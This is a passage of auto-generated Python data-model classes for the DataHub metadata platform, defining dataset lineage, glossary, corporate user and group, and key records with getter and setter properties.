self._inner_dict['datasetNameDelimiter'] = value
@property
def logoUrl(self) -> Union[None, str]:
"""Getter: The URL for a logo associated with the platform"""
return self._inner_dict.get('logoUrl') # type: ignore
@logoUrl.setter
def logoUrl(self, value: Union[None, str]) -> None:
"""Setter: The URL for a logo associated with the platform"""
self._inner_dict['logoUrl'] = value
class PlatformTypeClass(object):
"""Platform types available at LinkedIn"""
"""Value for a file system, e.g. hdfs"""
FILE_SYSTEM = "FILE_SYSTEM"
"""Value for a key value store, e.g. espresso, voldemort"""
KEY_VALUE_STORE = "KEY_VALUE_STORE"
"""Value for a message broker, e.g. kafka"""
MESSAGE_BROKER = "MESSAGE_BROKER"
"""Value for an object store, e.g. ambry"""
OBJECT_STORE = "OBJECT_STORE"
"""Value for an OLAP datastore, e.g. pinot"""
OLAP_DATASTORE = "OLAP_DATASTORE"
"""Value for other platforms, e.g salesforce, dovetail"""
OTHERS = "OTHERS"
"""Value for a query engine, e.g. presto"""
QUERY_ENGINE = "QUERY_ENGINE"
"""Value for a relational database, e.g. oracle, mysql"""
RELATIONAL_DB = "RELATIONAL_DB"
"""Value for a search engine, e.g seas"""
SEARCH_ENGINE = "SEARCH_ENGINE"
class DataProcessInfoClass(DictWrapper):
"""The inputs and outputs of this data process"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataprocess.DataProcessInfo")
def __init__(self,
inputs: Union[None, List[str]]=None,
outputs: Union[None, List[str]]=None,
):
super().__init__()
self.inputs = inputs
self.outputs = outputs
@classmethod
def construct_with_defaults(cls) -> "DataProcessInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.inputs = self.RECORD_SCHEMA.field_map["inputs"].default
self.outputs = self.RECORD_SCHEMA.field_map["outputs"].default
@property
def inputs(self) -> Union[None, List[str]]:
"""Getter: the inputs of the data process"""
return self._inner_dict.get('inputs') # type: ignore
@inputs.setter
def inputs(self, value: Union[None, List[str]]) -> None:
"""Setter: the inputs of the data process"""
self._inner_dict['inputs'] = value
@property
def outputs(self) -> Union[None, List[str]]:
"""Getter: the outputs of the data process"""
return self._inner_dict.get('outputs') # type: ignore
@outputs.setter
def outputs(self, value: Union[None, List[str]]) -> None:
"""Setter: the outputs of the data process"""
self._inner_dict['outputs'] = value
class DatasetDeprecationClass(DictWrapper):
"""Dataset deprecation status"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetDeprecation")
def __init__(self,
deprecated: bool,
note: str,
decommissionTime: Union[None, int]=None,
actor: Union[None, str]=None,
):
super().__init__()
self.deprecated = deprecated
self.decommissionTime = decommissionTime
self.note = note
self.actor = actor
@classmethod
def construct_with_defaults(cls) -> "DatasetDeprecationClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.deprecated = bool()
self.decommissionTime = self.RECORD_SCHEMA.field_map["decommissionTime"].default
self.note = str()
self.actor = self.RECORD_SCHEMA.field_map["actor"].default
@property
def deprecated(self) -> bool:
"""Getter: Whether the dataset is deprecated by owner."""
return self._inner_dict.get('deprecated') # type: ignore
@deprecated.setter
def deprecated(self, value: bool) -> None:
"""Setter: Whether the dataset is deprecated by owner."""
self._inner_dict['deprecated'] = value
@property
def decommissionTime(self) -> Union[None, int]:
"""Getter: The time user plan to decommission this dataset."""
return self._inner_dict.get('decommissionTime') # type: ignore
@decommissionTime.setter
def decommissionTime(self, value: Union[None, int]) -> None:
"""Setter: The time user plan to decommission this dataset."""
self._inner_dict['decommissionTime'] = value
@property
def note(self) -> str:
"""Getter: Additional information about the dataset deprecation plan, such as the wiki, doc, RB."""
return self._inner_dict.get('note') # type: ignore
@note.setter
def note(self, value: str) -> None:
"""Setter: Additional information about the dataset deprecation plan, such as the wiki, doc, RB."""
self._inner_dict['note'] = value
@property
def actor(self) -> Union[None, str]:
"""Getter: The corpuser URN which will be credited for modifying this deprecation content."""
return self._inner_dict.get('actor') # type: ignore
@actor.setter
def actor(self, value: Union[None, str]) -> None:
"""Setter: The corpuser URN which will be credited for modifying this deprecation content."""
self._inner_dict['actor'] = value
class DatasetFieldMappingClass(DictWrapper):
"""Representation of mapping between fields in source dataset to the field in destination dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetFieldMapping")
def __init__(self,
created: "AuditStampClass",
transformation: Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"],
sourceFields: List[str],
destinationField: str,
):
super().__init__()
self.created = created
self.transformation = transformation
self.sourceFields = sourceFields
self.destinationField = destinationField
@classmethod
def construct_with_defaults(cls) -> "DatasetFieldMappingClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = AuditStampClass.construct_with_defaults()
self.transformation = TransformationTypeClass.BLACKBOX
self.sourceFields = list()
self.destinationField = str()
@property
def created(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the field mapping and when"""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the field mapping and when"""
self._inner_dict['created'] = value
@property
def transformation(self) -> Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"]:
"""Getter: Transfomration function between the fields involved"""
return self._inner_dict.get('transformation') # type: ignore
@transformation.setter
def transformation(self, value: Union[Union[str, "TransformationTypeClass"], "UDFTransformerClass"]) -> None:
"""Setter: Transfomration function between the fields involved"""
self._inner_dict['transformation'] = value
@property
def sourceFields(self) -> List[str]:
"""Getter: Source fields from which the fine grained lineage is derived"""
return self._inner_dict.get('sourceFields') # type: ignore
@sourceFields.setter
def sourceFields(self, value: List[str]) -> None:
"""Setter: Source fields from which the fine grained lineage is derived"""
self._inner_dict['sourceFields'] = value
@property
def destinationField(self) -> str:
"""Getter: Destination field which is derived from source fields"""
return self._inner_dict.get('destinationField') # type: ignore
@destinationField.setter
def destinationField(self, value: str) -> None:
"""Setter: Destination field which is derived from source fields"""
self._inner_dict['destinationField'] = value
class DatasetLineageTypeClass(object):
"""The various types of supported dataset lineage"""
"""Direct copy without modification"""
COPY = "COPY"
"""Transformed data with modification (format or content change)"""
TRANSFORMED = "TRANSFORMED"
"""Represents a view defined on the sources e.g. Hive view defined on underlying hive tables or a Hive table pointing to a HDFS dataset or DALI view defined on multiple sources"""
VIEW = "VIEW"
class DatasetPropertiesClass(DictWrapper):
"""Properties associated with a Dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetProperties")
def __init__(self,
customProperties: Optional[Dict[str, str]]=None,
externalUrl: Union[None, str]=None,
description: Union[None, str]=None,
uri: Union[None, str]=None,
tags: Optional[List[str]]=None,
):
super().__init__()
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
self.externalUrl = externalUrl
self.description = description
self.uri = uri
if tags is None:
# default: []
self.tags = list()
else:
self.tags = tags
@classmethod
def construct_with_defaults(cls) -> "DatasetPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.customProperties = dict()
self.externalUrl = self.RECORD_SCHEMA.field_map["externalUrl"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
self.uri = self.RECORD_SCHEMA.field_map["uri"].default
self.tags = list()
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: Custom property bag."""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: Custom property bag."""
self._inner_dict['customProperties'] = value
@property
def externalUrl(self) -> Union[None, str]:
"""Getter: URL where the reference exist"""
return self._inner_dict.get('externalUrl') # type: ignore
@externalUrl.setter
def externalUrl(self, value: Union[None, str]) -> None:
"""Setter: URL where the reference exist"""
self._inner_dict['externalUrl'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the dataset"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the dataset"""
self._inner_dict['description'] = value
@property
def uri(self) -> Union[None, str]:
"""Getter: The abstracted URI such as hdfs:///data/tracking/PageViewEvent, file:///dir/file_name. Uri should not include any environment specific properties. Some datasets might not have a standardized uri, which makes this field optional (i.e. kafka topic)."""
return self._inner_dict.get('uri') # type: ignore
@uri.setter
def uri(self, value: Union[None, str]) -> None:
"""Setter: The abstracted URI such as hdfs:///data/tracking/PageViewEvent, file:///dir/file_name. Uri should not include any environment specific properties. Some datasets might not have a standardized uri, which makes this field optional (i.e. kafka topic)."""
self._inner_dict['uri'] = value
@property
def tags(self) -> List[str]:
"""Getter: [Legacy] Unstructured tags for the dataset. Structured tags can be applied via the `GlobalTags` aspect."""
return self._inner_dict.get('tags') # type: ignore
@tags.setter
def tags(self, value: List[str]) -> None:
"""Setter: [Legacy] Unstructured tags for the dataset. Structured tags can be applied via the `GlobalTags` aspect."""
self._inner_dict['tags'] = value
class DatasetUpstreamLineageClass(DictWrapper):
"""Fine Grained upstream lineage for fields in a dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.DatasetUpstreamLineage")
def __init__(self,
fieldMappings: List["DatasetFieldMappingClass"],
):
super().__init__()
self.fieldMappings = fieldMappings
@classmethod
def construct_with_defaults(cls) -> "DatasetUpstreamLineageClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.fieldMappings = list()
@property
def fieldMappings(self) -> List["DatasetFieldMappingClass"]:
"""Getter: Upstream to downstream field level lineage mappings"""
return self._inner_dict.get('fieldMappings') # type: ignore
@fieldMappings.setter
def fieldMappings(self, value: List["DatasetFieldMappingClass"]) -> None:
"""Setter: Upstream to downstream field level lineage mappings"""
self._inner_dict['fieldMappings'] = value
class EditableDatasetPropertiesClass(DictWrapper):
"""EditableDatasetProperties stores editable changes made to dataset properties. This separates changes made from
ingestion pipelines and edits in the UI to avoid accidental overwrites of user-provided data by ingestion pipelines"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.EditableDatasetProperties")
def __init__(self,
created: Optional["AuditStampClass"]=None,
lastModified: Optional["AuditStampClass"]=None,
deleted: Union[None, "AuditStampClass"]=None,
description: Union[None, str]=None,
):
super().__init__()
if created is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
else:
self.created = created
if lastModified is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
else:
self.lastModified = lastModified
self.deleted = deleted
self.description = description
@classmethod
def construct_with_defaults(cls) -> "EditableDatasetPropertiesClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.created = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["created"].default, writers_schema=self.RECORD_SCHEMA.field_map["created"].type)
self.lastModified = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["lastModified"].default, writers_schema=self.RECORD_SCHEMA.field_map["lastModified"].type)
self.deleted = self.RECORD_SCHEMA.field_map["deleted"].default
self.description = self.RECORD_SCHEMA.field_map["description"].default
@property
def created(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
return self._inner_dict.get('created') # type: ignore
@created.setter
def created(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the creation of this resource/association/sub-resource. A value of 0 for time indicates missing data."""
self._inner_dict['created'] = value
@property
def lastModified(self) -> "AuditStampClass":
"""Getter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
return self._inner_dict.get('lastModified') # type: ignore
@lastModified.setter
def lastModified(self, value: "AuditStampClass") -> None:
"""Setter: An AuditStamp corresponding to the last modification of this resource/association/sub-resource. If no modification has happened since creation, lastModified should be the same as created. A value of 0 for time indicates missing data."""
self._inner_dict['lastModified'] = value
@property
def deleted(self) -> Union[None, "AuditStampClass"]:
"""Getter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
return self._inner_dict.get('deleted') # type: ignore
@deleted.setter
def deleted(self, value: Union[None, "AuditStampClass"]) -> None:
"""Setter: An AuditStamp corresponding to the deletion of this resource/association/sub-resource. Logically, deleted MUST have a later timestamp than creation. It may or may not have the same time as lastModified depending upon the resource/association/sub-resource semantics."""
self._inner_dict['deleted'] = value
@property
def description(self) -> Union[None, str]:
"""Getter: Documentation of the dataset"""
return self._inner_dict.get('description') # type: ignore
@description.setter
def description(self, value: Union[None, str]) -> None:
"""Setter: Documentation of the dataset"""
self._inner_dict['description'] = value
class UpstreamClass(DictWrapper):
"""Upstream lineage information about a dataset including the source reporting the lineage"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.Upstream")
def __init__(self,
dataset: str,
type: Union[str, "DatasetLineageTypeClass"],
auditStamp: Optional["AuditStampClass"]=None,
):
super().__init__()
if auditStamp is None:
# default: {'actor': 'urn:li:corpuser:unknown', 'impersonator': None, 'time': 0}
self.auditStamp = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["auditStamp"].default, writers_schema=self.RECORD_SCHEMA.field_map["auditStamp"].type)
else:
self.auditStamp = auditStamp
self.dataset = dataset
self.type = type
@classmethod
def construct_with_defaults(cls) -> "UpstreamClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.auditStamp = _json_converter.from_json_object(self.RECORD_SCHEMA.field_map["auditStamp"].default, writers_schema=self.RECORD_SCHEMA.field_map["auditStamp"].type)
self.dataset = str()
self.type = DatasetLineageTypeClass.COPY
@property
def auditStamp(self) -> "AuditStampClass":
"""Getter: Audit stamp containing who reported the lineage and when.
WARNING: this field is deprecated and may be removed in a future release."""
return self._inner_dict.get('auditStamp') # type: ignore
@auditStamp.setter
def auditStamp(self, value: "AuditStampClass") -> None:
"""Setter: Audit stamp containing who reported the lineage and when.
WARNING: this field is deprecated and may be removed in a future release."""
self._inner_dict['auditStamp'] = value
@property
def dataset(self) -> str:
"""Getter: The upstream dataset the lineage points to"""
return self._inner_dict.get('dataset') # type: ignore
@dataset.setter
def dataset(self, value: str) -> None:
"""Setter: The upstream dataset the lineage points to"""
self._inner_dict['dataset'] = value
@property
def type(self) -> Union[str, "DatasetLineageTypeClass"]:
"""Getter: The type of the lineage"""
return self._inner_dict.get('type') # type: ignore
@type.setter
def type(self, value: Union[str, "DatasetLineageTypeClass"]) -> None:
"""Setter: The type of the lineage"""
self._inner_dict['type'] = value
class UpstreamLineageClass(DictWrapper):
"""Upstream lineage of a dataset"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.dataset.UpstreamLineage")
def __init__(self,
upstreams: List["UpstreamClass"],
):
super().__init__()
self.upstreams = upstreams
@classmethod
def construct_with_defaults(cls) -> "UpstreamLineageClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.upstreams = list()
@property
def upstreams(self) -> List["UpstreamClass"]:
"""Getter: List of upstream dataset lineage information"""
return self._inner_dict.get('upstreams') # type: ignore
@upstreams.setter
def upstreams(self, value: List["UpstreamClass"]) -> None:
"""Setter: List of upstream dataset lineage information"""
self._inner_dict['upstreams'] = value
class GlossaryNodeInfoClass(DictWrapper):
"""Properties associated with a GlossaryNode"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.glossary.GlossaryNodeInfo")
def __init__(self,
definition: str,
parentNode: Union[None, str]=None,
):
super().__init__()
self.definition = definition
self.parentNode = parentNode
@classmethod
def construct_with_defaults(cls) -> "GlossaryNodeInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.definition = str()
self.parentNode = self.RECORD_SCHEMA.field_map["parentNode"].default
@property
def definition(self) -> str:
"""Getter: Definition of business node"""
return self._inner_dict.get('definition') # type: ignore
@definition.setter
def definition(self, value: str) -> None:
"""Setter: Definition of business node"""
self._inner_dict['definition'] = value
@property
def parentNode(self) -> Union[None, str]:
"""Getter: Parent node of the glossary term"""
return self._inner_dict.get('parentNode') # type: ignore
@parentNode.setter
def parentNode(self, value: Union[None, str]) -> None:
"""Setter: Parent node of the glossary term"""
self._inner_dict['parentNode'] = value
class GlossaryTermInfoClass(DictWrapper):
"""Properties associated with a GlossaryTerm"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.glossary.GlossaryTermInfo")
def __init__(self,
definition: str,
termSource: str,
parentNode: Union[None, str]=None,
sourceRef: Union[None, str]=None,
sourceUrl: Union[None, str]=None,
customProperties: Optional[Dict[str, str]]=None,
):
super().__init__()
self.definition = definition
self.parentNode = parentNode
self.termSource = termSource
self.sourceRef = sourceRef
self.sourceUrl = sourceUrl
if customProperties is None:
# default: {}
self.customProperties = dict()
else:
self.customProperties = customProperties
@classmethod
def construct_with_defaults(cls) -> "GlossaryTermInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.definition = str()
self.parentNode = self.RECORD_SCHEMA.field_map["parentNode"].default
self.termSource = str()
self.sourceRef = self.RECORD_SCHEMA.field_map["sourceRef"].default
self.sourceUrl = self.RECORD_SCHEMA.field_map["sourceUrl"].default
self.customProperties = dict()
@property
def definition(self) -> str:
"""Getter: Definition of business term"""
return self._inner_dict.get('definition') # type: ignore
@definition.setter
def definition(self, value: str) -> None:
"""Setter: Definition of business term"""
self._inner_dict['definition'] = value
@property
def parentNode(self) -> Union[None, str]:
"""Getter: Parent node of the glossary term"""
return self._inner_dict.get('parentNode') # type: ignore
@parentNode.setter
def parentNode(self, value: Union[None, str]) -> None:
"""Setter: Parent node of the glossary term"""
self._inner_dict['parentNode'] = value
@property
def termSource(self) -> str:
"""Getter: Source of the Business Term (INTERNAL or EXTERNAL) with default value as INTERNAL"""
return self._inner_dict.get('termSource') # type: ignore
@termSource.setter
def termSource(self, value: str) -> None:
"""Setter: Source of the Business Term (INTERNAL or EXTERNAL) with default value as INTERNAL"""
self._inner_dict['termSource'] = value
@property
def sourceRef(self) -> Union[None, str]:
"""Getter: External Reference to the business-term"""
return self._inner_dict.get('sourceRef') # type: ignore
@sourceRef.setter
def sourceRef(self, value: Union[None, str]) -> None:
"""Setter: External Reference to the business-term"""
self._inner_dict['sourceRef'] = value
@property
def sourceUrl(self) -> Union[None, str]:
"""Getter: The abstracted URL such as https://spec.edmcouncil.org/fibo/ontology/FBC/FinancialInstruments/FinancialInstruments/CashInstrument."""
return self._inner_dict.get('sourceUrl') # type: ignore
@sourceUrl.setter
def sourceUrl(self, value: Union[None, str]) -> None:
"""Setter: The abstracted URL such as https://spec.edmcouncil.org/fibo/ontology/FBC/FinancialInstruments/FinancialInstruments/CashInstrument."""
self._inner_dict['sourceUrl'] = value
@property
def customProperties(self) -> Dict[str, str]:
"""Getter: A key-value map to capture any other non-standardized properties for the glossary term"""
return self._inner_dict.get('customProperties') # type: ignore
@customProperties.setter
def customProperties(self, value: Dict[str, str]) -> None:
"""Setter: A key-value map to capture any other non-standardized properties for the glossary term"""
self._inner_dict['customProperties'] = value
class CorpGroupInfoClass(DictWrapper):
"""group of corpUser, it may contains nested group"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpGroupInfo")
def __init__(self,
email: str,
admins: List[str],
members: List[str],
groups: List[str],
):
super().__init__()
self.email = email
self.admins = admins
self.members = members
self.groups = groups
@classmethod
def construct_with_defaults(cls) -> "CorpGroupInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.email = str()
self.admins = list()
self.members = list()
self.groups = list()
@property
def email(self) -> str:
"""Getter: email of this group"""
return self._inner_dict.get('email') # type: ignore
@email.setter
def email(self, value: str) -> None:
"""Setter: email of this group"""
self._inner_dict['email'] = value
@property
def admins(self) -> List[str]:
"""Getter: owners of this group"""
return self._inner_dict.get('admins') # type: ignore
@admins.setter
def admins(self, value: List[str]) -> None:
"""Setter: owners of this group"""
self._inner_dict['admins'] = value
@property
def members(self) -> List[str]:
"""Getter: List of ldap urn in this group."""
return self._inner_dict.get('members') # type: ignore
@members.setter
def members(self, value: List[str]) -> None:
"""Setter: List of ldap urn in this group."""
self._inner_dict['members'] = value
@property
def groups(self) -> List[str]:
"""Getter: List of groups in this group."""
return self._inner_dict.get('groups') # type: ignore
@groups.setter
def groups(self, value: List[str]) -> None:
"""Setter: List of groups in this group."""
self._inner_dict['groups'] = value
class CorpUserEditableInfoClass(DictWrapper):
"""Linkedin corp user information that can be edited from UI"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpUserEditableInfo")
def __init__(self,
aboutMe: Union[None, str]=None,
teams: Optional[List[str]]=None,
skills: Optional[List[str]]=None,
pictureLink: Optional[str]=None,
):
super().__init__()
self.aboutMe = aboutMe
if teams is None:
# default: []
self.teams = list()
else:
self.teams = teams
if skills is None:
# default: []
self.skills = list()
else:
self.skills = skills
if pictureLink is None:
# default: 'https://raw.githubusercontent.com/linkedin/datahub/master/datahub-web/packages/data-portal/public/assets/images/default_avatar.png'
self.pictureLink = self.RECORD_SCHEMA.field_map["pictureLink"].default
else:
self.pictureLink = pictureLink
@classmethod
def construct_with_defaults(cls) -> "CorpUserEditableInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.aboutMe = self.RECORD_SCHEMA.field_map["aboutMe"].default
self.teams = list()
self.skills = list()
self.pictureLink = self.RECORD_SCHEMA.field_map["pictureLink"].default
@property
def aboutMe(self) -> Union[None, str]:
"""Getter: About me section of the user"""
return self._inner_dict.get('aboutMe') # type: ignore
@aboutMe.setter
def aboutMe(self, value: Union[None, str]) -> None:
"""Setter: About me section of the user"""
self._inner_dict['aboutMe'] = value
@property
def teams(self) -> List[str]:
"""Getter: Teams that the user belongs to e.g. Metadata"""
return self._inner_dict.get('teams') # type: ignore
@teams.setter
def teams(self, value: List[str]) -> None:
"""Setter: Teams that the user belongs to e.g. Metadata"""
self._inner_dict['teams'] = value
@property
def skills(self) -> List[str]:
"""Getter: Skills that the user possesses e.g. Machine Learning"""
return self._inner_dict.get('skills') # type: ignore
@skills.setter
def skills(self, value: List[str]) -> None:
"""Setter: Skills that the user possesses e.g. Machine Learning"""
self._inner_dict['skills'] = value
@property
def pictureLink(self) -> str:
"""Getter: A URL which points to a picture which user wants to set as a profile photo"""
return self._inner_dict.get('pictureLink') # type: ignore
@pictureLink.setter
def pictureLink(self, value: str) -> None:
"""Setter: A URL which points to a picture which user wants to set as a profile photo"""
self._inner_dict['pictureLink'] = value
class CorpUserInfoClass(DictWrapper):
"""Linkedin corp user information"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.identity.CorpUserInfo")
def __init__(self,
active: bool,
email: str,
displayName: Union[None, str]=None,
title: Union[None, str]=None,
managerUrn: Union[None, str]=None,
departmentId: Union[None, int]=None,
departmentName: Union[None, str]=None,
firstName: Union[None, str]=None,
lastName: Union[None, str]=None,
fullName: Union[None, str]=None,
countryCode: Union[None, str]=None,
):
super().__init__()
self.active = active
self.displayName = displayName
self.email = email
self.title = title
self.managerUrn = managerUrn
self.departmentId = departmentId
self.departmentName = departmentName
self.firstName = firstName
self.lastName = lastName
self.fullName = fullName
self.countryCode = countryCode
@classmethod
def construct_with_defaults(cls) -> "CorpUserInfoClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.active = bool()
self.displayName = self.RECORD_SCHEMA.field_map["displayName"].default
self.email = str()
self.title = self.RECORD_SCHEMA.field_map["title"].default
self.managerUrn = self.RECORD_SCHEMA.field_map["managerUrn"].default
self.departmentId = self.RECORD_SCHEMA.field_map["departmentId"].default
self.departmentName = self.RECORD_SCHEMA.field_map["departmentName"].default
self.firstName = self.RECORD_SCHEMA.field_map["firstName"].default
self.lastName = self.RECORD_SCHEMA.field_map["lastName"].default
self.fullName = self.RECORD_SCHEMA.field_map["fullName"].default
self.countryCode = self.RECORD_SCHEMA.field_map["countryCode"].default
@property
def active(self) -> bool:
"""Getter: Whether the corpUser is active, ref: https://iwww.corp.linkedin.com/wiki/cf/display/GTSD/Accessing+Active+Directory+via+LDAP+tools"""
return self._inner_dict.get('active') # type: ignore
@active.setter
def active(self, value: bool) -> None:
"""Setter: Whether the corpUser is active, ref: https://iwww.corp.linkedin.com/wiki/cf/display/GTSD/Accessing+Active+Directory+via+LDAP+tools"""
self._inner_dict['active'] = value
@property
def displayName(self) -> Union[None, str]:
"""Getter: displayName of this user , e.g. Hang Zhang(DataHQ)"""
return self._inner_dict.get('displayName') # type: ignore
@displayName.setter
def displayName(self, value: Union[None, str]) -> None:
"""Setter: displayName of this user , e.g. Hang Zhang(DataHQ)"""
self._inner_dict['displayName'] = value
@property
def email(self) -> str:
"""Getter: email address of this user"""
return self._inner_dict.get('email') # type: ignore
@email.setter
def email(self, value: str) -> None:
"""Setter: email address of this user"""
self._inner_dict['email'] = value
@property
def title(self) -> Union[None, str]:
"""Getter: title of this user"""
return self._inner_dict.get('title') # type: ignore
@title.setter
def title(self, value: Union[None, str]) -> None:
"""Setter: title of this user"""
self._inner_dict['title'] = value
@property
def managerUrn(self) -> Union[None, str]:
"""Getter: direct manager of this user"""
return self._inner_dict.get('managerUrn') # type: ignore
@managerUrn.setter
def managerUrn(self, value: Union[None, str]) -> None:
"""Setter: direct manager of this user"""
self._inner_dict['managerUrn'] = value
@property
def departmentId(self) -> Union[None, int]:
"""Getter: department id this user belong to"""
return self._inner_dict.get('departmentId') # type: ignore
@departmentId.setter
def departmentId(self, value: Union[None, int]) -> None:
"""Setter: department id this user belong to"""
self._inner_dict['departmentId'] = value
@property
def departmentName(self) -> Union[None, str]:
"""Getter: department name this user belong to"""
return self._inner_dict.get('departmentName') # type: ignore
@departmentName.setter
def departmentName(self, value: Union[None, str]) -> None:
"""Setter: department name this user belong to"""
self._inner_dict['departmentName'] = value
@property
def firstName(self) -> Union[None, str]:
"""Getter: first name of this user"""
return self._inner_dict.get('firstName') # type: ignore
@firstName.setter
def firstName(self, value: Union[None, str]) -> None:
"""Setter: first name of this user"""
self._inner_dict['firstName'] = value
@property
def lastName(self) -> Union[None, str]:
"""Getter: last name of this user"""
return self._inner_dict.get('lastName') # type: ignore
@lastName.setter
def lastName(self, value: Union[None, str]) -> None:
"""Setter: last name of this user"""
self._inner_dict['lastName'] = value
@property
def fullName(self) -> Union[None, str]:
"""Getter: Common name of this user, format is firstName + lastName (split by a whitespace)"""
return self._inner_dict.get('fullName') # type: ignore
@fullName.setter
def fullName(self, value: Union[None, str]) -> None:
"""Setter: Common name of this user, format is firstName + lastName (split by a whitespace)"""
self._inner_dict['fullName'] = value
@property
def countryCode(self) -> Union[None, str]:
"""Getter: two uppercase letters country code. e.g. US"""
return self._inner_dict.get('countryCode') # type: ignore
@countryCode.setter
def countryCode(self, value: Union[None, str]) -> None:
"""Setter: two uppercase letters country code. e.g. US"""
self._inner_dict['countryCode'] = value
class ChartKeyClass(DictWrapper):
"""Key for a Chart"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.ChartKey")
def __init__(self,
dashboardTool: str,
chartId: str,
):
super().__init__()
self.dashboardTool = dashboardTool
self.chartId = chartId
@classmethod
def construct_with_defaults(cls) -> "ChartKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.dashboardTool = str()
self.chartId = str()
@property
def dashboardTool(self) -> str:
"""Getter: The name of the dashboard tool such as looker, redash etc."""
return self._inner_dict.get('dashboardTool') # type: ignore
@dashboardTool.setter
def dashboardTool(self, value: str) -> None:
"""Setter: The name of the dashboard tool such as looker, redash etc."""
self._inner_dict['dashboardTool'] = value
@property
def chartId(self) -> str:
"""Getter: Unique id for the chart. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, chart URL could be used here for Looker such as 'looker.linkedin.com/looks/1234'"""
return self._inner_dict.get('chartId') # type: ignore
@chartId.setter
def chartId(self, value: str) -> None:
"""Setter: Unique id for the chart. This id should be globally unique for a dashboarding tool even when there are multiple deployments of it. As an example, chart URL could be used here for Looker such as 'looker.linkedin.com/looks/1234'"""
self._inner_dict['chartId'] = value
class CorpGroupKeyClass(DictWrapper):
"""Key for a CorpGroup"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.CorpGroupKey")
def __init__(self,
name: str,
):
super().__init__()
self.name = name
@classmethod
def construct_with_defaults(cls) -> "CorpGroupKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.name = str()
@property
def name(self) -> str:
"""Getter: The name of the AD/LDAP group."""
return self._inner_dict.get('name') # type: ignore
@name.setter
def name(self, value: str) -> None:
"""Setter: The name of the AD/LDAP group."""
self._inner_dict['name'] = value
class CorpUserKeyClass(DictWrapper):
"""Key for a CorpUser"""
RECORD_SCHEMA = get_schema_type("com.linkedin.pegasus2avro.metadata.key.CorpUserKey")
def __init__(self,
username: str,
):
super().__init__()
self.username = username
@classmethod
def construct_with_defaults(cls) -> "CorpUserKeyClass":
self = cls.construct({})
self._restore_defaults()
return self
def _restore_defaults(self) -> None:
self.username = str()
@property
def username(self) -> str:
"""Getter: The name of the AD/LDAP user."""
return self._inner_dict.get('username') # type: ignore
@username.setter
def username(self, value: str) -> None:
